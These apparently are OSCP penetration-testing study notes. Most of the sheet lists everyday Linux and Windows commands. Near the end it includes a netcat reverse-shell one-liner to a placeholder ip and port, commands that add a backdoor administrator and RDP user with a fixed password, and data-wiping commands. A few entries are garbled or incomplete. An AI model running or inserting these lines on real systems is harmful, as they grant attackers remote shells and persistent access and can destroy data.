Linux / WindowsMain commands

Linux main commands in OSCP
find / -name file 2>/dev/null
ls -ltr - Sort list by last modified. -time -reverse
# Remove recursively and its content. Very dangerous command!
rm -rf ./directory
List what rights the sudo user has.
sudo -l
# This will send all permissions denied outputs to dev/null.
find / -name file 2>/dev/null
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
which bash
# Usually outputs: /bin/bash
sort test.txt
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
sed "1d"
#cut :
64 bytes from icmp_req=1 ttl=255 time=4.86 ms
cut -d" " -f4
-d stands for delimiter. and -f for field.
tr - Translate
Transform all letter into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2
Remove character
# Remove characters
cat file.txt | tr -d "."
# Remove all dots and replace them with underscore.
cat file.txt | tr "." "_"
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
awk '/' error.log
awk '{print}' filename
We can use the -F flag to add a custom delimiter. : awk -F ':' '{print $1}' test.txt
So if you are manipulating some text you might want to start the output with some info about the columns or something like that. To do that we can use the BEGIN-keyword.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
# list cronjobs
crontab -l
# Edit or create new cronjobs
crontab -e
#List all devices
fdisk -l
systemctl start ssh
systemctl status ssh
systemctl stop ssh
Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool. So it works on both mac, windows and linux.
$ netstat -antlp
netstat -anpt
iptables -L
# Remove one specific rule
iptables -D INPUT 2
Iteration over a file
This script will iterate over a file and echo out every single line:
for line in $(cat file.txt);do
echo $line
Another Way
while read p; do
echo $p
done <file.txt
For Loops
for ((i = 0; i < 10; i++)); do
echo $i
Another way to write this is by using the program seq. Seq is pretty much like range() in python. So it can be used like this:
for x in `seq 1 100`; do
echo $x
locate 646.c | tail -n 1
This can be done like this:
cat $(locate 646.c | tail -n 1)
VI Operators
VI -
Operators are commands that do things. Like delete, change or copy.
c - change
ce - change until end of the word.
c$ - change until end of line.
Combining Motions and Operators
Now that you know some motion commands and operator commands. You can start combining them.
dw - delete word
d$ - delete to the end of the line
Password Creation
openssl passwd sam
Windows Commands
show hidden files:
dir /A
Print out file content, like cat
type file.txt
grep files
findstr file.txt
show network information
netstat -an
Show network adapter info
List processes
Kill a process
taskkill /PID 1532 /F
Shreds the whole machine
ciper /w:C:\
Mounting - Mapping
wmic logicaldisk get deviceid, volumename, description
Scripts for fun
Make Request:
import requests
req = requests.get("http://site.com")
print req.status_code
print req.text
Read and write to files
file_open = open("readme.txt", "r")
for line in file_open:
print line.strip("\n")
if line.strip("\n") == "rad 4":
print "last line"
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py
Add RDP User
Add RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
Enable RDP via Registry
Enable rdp via regsitry